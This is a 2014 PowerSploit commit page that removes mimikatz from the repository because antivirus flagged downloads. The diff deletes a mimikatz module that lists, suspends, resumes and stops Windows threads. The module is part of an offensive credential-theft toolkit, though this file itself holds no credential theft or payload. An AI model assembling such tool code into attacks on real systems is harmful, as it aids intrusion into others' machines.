author | mattifestation <mattgraeber@gmail.com> | 2014-02-03 17:13:35 -0500 |
---|---|---|
committer | mattifestation <mattgraeber@gmail.com> | 2014-02-03 17:13:41 -0500 |
commit | c5168cdba6a3b2d7dd8d79c8ac9583d3ace6a504 (patch) | |
tree | 31e4238db4984481442faa780e8921782c5de848 /Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp | |
parent | d9ca5357e4603222268b1c619da10cc7858153d4 (diff) | |
Removed mimikatz.
This doesn't need to reside in PowerSploit. Those that are truly
paranoid should validate that the embedded executable in
Invoke-Mimikatz.ps1 is indeed mimikatz.
This was causing AV to flag upon downloading PowerSploit.
Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp')
-rw-r--r-- | Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp | 138 |
1 files changed, 0 insertions, 138 deletions
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp
deleted file mode 100644
index 3a8edc0..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_thread.cpp
+++ /dev/null
@@ -1,138 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_thread.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_thread::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(list, L"list", L"Liste les threads")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(suspend, L"suspend", L"Suspend un thread actif")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(resume, L"resume", L"Reprend un thread suspendu")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(stop, L"stop", L"Arrête un thread")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(quit, L"quit", L"Envoi un message de fermeture à un thread")); - return monVector; -} - -bool mod_mimikatz_thread::list(vector<wstring> * arguments) -{ - vector<THREADENTRY32> * vectorThreads = new vector<THREADENTRY32>(); - - DWORD processId = arguments->empty() ? 0 : _wtoi(arguments->front().c_str()); - - if(mod_thread::getList(vectorThreads, arguments->empty() ? 
NULL : &processId)) - { - (*outputStream) << L"PID\tTID\tprTh" << endl; - for(vector<THREADENTRY32>::iterator monThread = vectorThreads->begin(); monThread != vectorThreads->end(); monThread++) - (*outputStream) << - setw(5) << setfill(wchar_t(' ')) << monThread->th32OwnerProcessID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->th32ThreadID << L'\t' << - setw(5) << setfill(wchar_t(' ')) << monThread->tpBasePri << - endl; - } - else - (*outputStream) << L"mod_thread::getList ; " << mod_system::getWinError() << endl; - - delete vectorThreads; - return true; -} - -bool mod_mimikatz_thread::resume(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\treprise "; - - if(mod_thread::resume(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::resume ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::suspend(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tsuspension "; - - if(mod_thread::suspend(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::suspend ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - -bool mod_mimikatz_thread::stop(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = 
arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tarrêt "; - - if(mod_thread::stop(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::stop ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} - - -bool mod_mimikatz_thread::quit(vector<wstring> * arguments) -{ - for(vector<wstring>::iterator monArgThread = arguments->begin(); monArgThread != arguments->end(); monArgThread++) - { - DWORD threadId = _wtoi(monArgThread->c_str()); - - if(threadId != 0) - { - (*outputStream) << L"thread " << setw(5) << setfill(wchar_t(' ')) << threadId << L"\tmessage fermeture "; - - if(mod_thread::quit(threadId)) - (*outputStream) << L"OK"; - else - (*outputStream) << L"KO - mod_thread::quit ; " << mod_system::getWinError(); - } - else - (*outputStream) << L"argument \'" << *monArgThread << L"\' invalide"; - - (*outputStream) << endl; - } - - return true; -} |